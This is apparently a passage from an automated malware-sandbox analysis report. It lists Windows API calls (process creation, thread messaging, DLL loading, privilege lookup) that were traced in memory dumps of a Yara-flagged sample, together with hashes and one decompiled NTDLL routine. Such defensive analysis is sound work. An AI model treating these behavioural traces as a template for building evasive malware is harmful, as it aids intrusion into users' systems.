                                            • Opcode Fuzzy Hash: 2c7a30d7ae02a3fd59c3fa525724d959a8e2e3c12835d33fba6ba57c56d75897
                                            • Instruction Fuzzy Hash: 64900261342041527545B1594C05907440AA7E0285792D092A2415950C9566E856F661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 61e955164c9dc43917eebc25d7da86a581c4a226d5f9714b9404ef21590d83ae
                                            • Instruction ID: 13fea128ce6ab17e8f58cc42665e9f9e7d3605508d963ef8dc89d2047011b61d
                                            • Opcode Fuzzy Hash: 61e955164c9dc43917eebc25d7da86a581c4a226d5f9714b9404ef21590d83ae
                                            • Instruction Fuzzy Hash: 519002A134100442F10061594C15F060409D7E1345F52D095E2065554D9659DC527166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 157b6fcf591f5fc2b1ead521a959cf2455a4aea83f11f5c208d086b1fe0f417d
                                            • Instruction ID: ebdeee54c47cd813593c1f2e78a8f355945539497f6b6e1868b6ddb22ace62ab
                                            • Opcode Fuzzy Hash: 157b6fcf591f5fc2b1ead521a959cf2455a4aea83f11f5c208d086b1fe0f417d
                                            • Instruction Fuzzy Hash: 419002B130100402F14071594C05B46040997D0345F52D091A6065554E9699DDD576A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 23b1cfba294002fb57c220e93db4cbcaa1f9f24f348062f4d464aa4c007a472a
                                            • Instruction ID: 3e5bf3450b53248169e2ae08048b42d50c49deb0e2e2cca9ef7ad6f9c5a97b37
                                            • Opcode Fuzzy Hash: 23b1cfba294002fb57c220e93db4cbcaa1f9f24f348062f4d464aa4c007a472a
                                            • Instruction Fuzzy Hash: 7390026131180042F20065694C15F07040997D0347F52D195A1155554CD955D8617561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02DA8D08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: c7b4b477ee1b832759d18ad0b6c2c0adc7764b298f7aaf256b174f368e0316eb
                                            • Instruction ID: 7e6aa907736744c2bae0126a199b5f3f21119b20f13db30e94eb41dc38cfc57b
                                            • Opcode Fuzzy Hash: c7b4b477ee1b832759d18ad0b6c2c0adc7764b298f7aaf256b174f368e0316eb
                                            • Instruction Fuzzy Hash: A53160B6900644BFC724DF64D894FA7B7B9FF48700F00811DEA6AAB240D771AA50CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02DA8D08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 5f13f8630b4ea672a09270852822347165fcb6e58c6539702e134b6ce144b972
                                            • Instruction ID: f92f21d083b11e25056fe691a65c35762d5815a860b96509a1d8ec5ebce20550
                                            • Opcode Fuzzy Hash: 5f13f8630b4ea672a09270852822347165fcb6e58c6539702e134b6ce144b972
                                            • Instruction Fuzzy Hash: 0E318EB2900644BFCB20DF64C884F6ABBB4FF48704F14815DEA59AB341D775A950CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D93AF8), ref: 02DAA27D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 9fde8f79129296eabad62a6bf3620879abf5467ec668f0b6aea48e4315ab8808
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 25E046B1200208ABDB18EF99CC48EA777ADEF88750F018658FE085B341C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: c5896be731a3a4b42687d911ab56aa40e57b094ef25896738c9399396df43080
                                            • Instruction ID: 8035e5a0704d19c0ec68054b6bdb439c77d9ab7eeb35596891feb47a7e908a26
                                            • Opcode Fuzzy Hash: c5896be731a3a4b42687d911ab56aa40e57b094ef25896738c9399396df43080
                                            • Instruction Fuzzy Hash: 2A61ACB1A00209AFDB24DF64C885FAA77A9EF0A704F00456EF54AD7341DB70AE01DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
                                            • Instruction ID: b037029d19e392892f9ec61e91af7d86d6bb6daec0853ba37ee416841673d4bc
                                            • Opcode Fuzzy Hash: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
                                            • Instruction Fuzzy Hash: EB01A731A402287BEB20A6949C02FBE776CAB41F51F044115FF04FA2C0E6D46D0696F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D9834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D9836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: d73c61a6f495a5886f3316309de16a8217628b3a83bbe2f0d6c3eb1ada145eee
                                            • Instruction ID: 2805e85b11bfced20f396074b831bbadcb2d5f7da2963e3fad75fe1520e98b2c
                                            • Opcode Fuzzy Hash: d73c61a6f495a5886f3316309de16a8217628b3a83bbe2f0d6c3eb1ada145eee
                                            • Instruction Fuzzy Hash: 65F0E232A8062836EB2066985C42FBF625DAB82F11F154119FF04FA2C0E7D56D065AF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D9AD42
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
                                            • Instruction ID: 01b412763e72fd99abff5e804a0d2e0997e53f57b6cc3b5c1e7ea0f53b38e740
                                            • Opcode Fuzzy Hash: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
                                            • Instruction Fuzzy Hash: D3010CB6E4020DABDF10DAA4DC51F9DB3B9AB54208F104195A90897340F631EB54CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DAA314
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 3fb6103b0af15ca67c893ce3e75464b404bfd69a50e54fd0608c336b9630ecf3
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 2E01AFB2210108ABCB54DF89DC90EEB77AEAF8C754F158258BA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(02DA4506,?,02DA4C7F,02DA4C7F,?,02DA4506,?,?,?,?,?,00000000,00000000,?), ref: 02DAA23D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: c88a9df3e89932c88e9d59e4b04687a5bf5d5f3bf623729e1adec0eaaa9c9acc
                                            • Instruction ID: 93be4538aec17c37f8f9dcd0a7f538cb06398ef51260167b639232b5a0c1c884
                                            • Opcode Fuzzy Hash: c88a9df3e89932c88e9d59e4b04687a5bf5d5f3bf623729e1adec0eaaa9c9acc
                                            • Instruction Fuzzy Hash: 51F082726402146BD724EF94DC94EA7B7A9EF85350F1485A5F94C9B201D6319950CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9F020,?,?,00000000), ref: 02DA8DCC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 6511a16e4b14917326b122896ceb71f5618538fd8af596954ebce1b8c8a2f46e
                                            • Instruction ID: 3e52228ebf628b06f88578f27a1f1f2e93600dc15d071db7ea86fe717032d4e0
                                            • Opcode Fuzzy Hash: 6511a16e4b14917326b122896ceb71f5618538fd8af596954ebce1b8c8a2f46e
                                            • Instruction Fuzzy Hash: A2E092333813043AE730659DAC02FE7B39CCB91B25F540026FB0DEB2C0D595F90146A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9F020,?,?,00000000), ref: 02DA8DCC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 694d33176f405edb255a5154f6537ec4b841492a61a21fdb8736dc2d5a9f05f6
                                            • Instruction ID: 8c37cd315722b56c241e1a5761990e6b76719c92bdde71857b3f46193d12edc2
                                            • Opcode Fuzzy Hash: 694d33176f405edb255a5154f6537ec4b841492a61a21fdb8736dc2d5a9f05f6
                                            • Instruction Fuzzy Hash: EEF0E5323813003AD2206A589C12FA37B598B52B10F140159FA49AB3C1D6D5F90186A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(02DA4506,?,02DA4C7F,02DA4C7F,?,02DA4506,?,?,?,?,?,00000000,00000000,?), ref: 02DAA23D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 32d0d16250d55c78af36d67eed9cfb1b8e5f2c2fb5e4cc15eb1b9bb82ac34b0e
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 15E012B1200208ABDB14EF99CC40EA777ADEF88650F118558BA085B241C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D9F1A2,02D9F1A2,?,00000000,?,?), ref: 02DAA3E0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 11d3795f2dbc767ac380c2ae0033c43a88b1a6f7dde9e7f332d338a0706ebc3f
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 9DE01AB12002086BDB10DF49CC84EE777ADEF88650F018154BA0857241C934E8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,02D98CF4,?), ref: 02D9F6CB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 05f1cce9227cab663635d016f84c5865b96ef4d79a9f03a948cf3d0d0ed674a3
                                            • Instruction ID: da2577176da32787266874e0a147cedaa6a5bfc1ba0b0613021ee56410aa2d01
                                            • Opcode Fuzzy Hash: 05f1cce9227cab663635d016f84c5865b96ef4d79a9f03a948cf3d0d0ed674a3
                                            • Instruction Fuzzy Hash: AFE0C2757903007FEB10FBA4DC06F1733AAAB85714F0900A9F588DB3D3EA64E511C622
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,02D98CF4,?), ref: 02D9F6CB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
                                            • Instruction ID: 4d3e26852980e3f2e460a4616428bb240af008fb747deea2e605c3018ecc41d9
                                            • Opcode Fuzzy Hash: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
                                            • Instruction Fuzzy Hash: 85D05E716903043AEA10BAA49C02F26328A9B44A04F490064FA48D63C3EA50E5008565
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 42fa723d30c6106229a04ee04e84fbedab0e8cebeb7ab5da5632a9866dbfbbb9
                                            • Instruction ID: f9d12b513348adcbe2ce2a03b9de3b356432eb6ea9d48ab45235f63d3561838f
                                            • Opcode Fuzzy Hash: 42fa723d30c6106229a04ee04e84fbedab0e8cebeb7ab5da5632a9866dbfbbb9
                                            • Instruction Fuzzy Hash: 5AB09BB19014C5C5F711D7614E08B277D4477D0745F17D492D2030641B477CD0D1F5B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 53%
                                            			E04F3FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E04EECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E04F35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E04F35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F3FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F3FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F3FE2B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true
                                            • Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp
                                            • Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: b86328904b1edb1f1bd5aeaecfbf2f7c1879371f3d90b5b3fede74320f695e30
                                            • Instruction ID: 170a6f3d4fbc2a8ec3a5cc09ea8c2397cf769d2bc03260ac65fc6a371ae204e7
                                            • Opcode Fuzzy Hash: b86328904b1edb1f1bd5aeaecfbf2f7c1879371f3d90b5b3fede74320f695e30
                                            • Instruction Fuzzy Hash: 92F0F672640201BFEA241A45DC02F33BB9AEB84731F240354F628561E1EA62FC6196F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%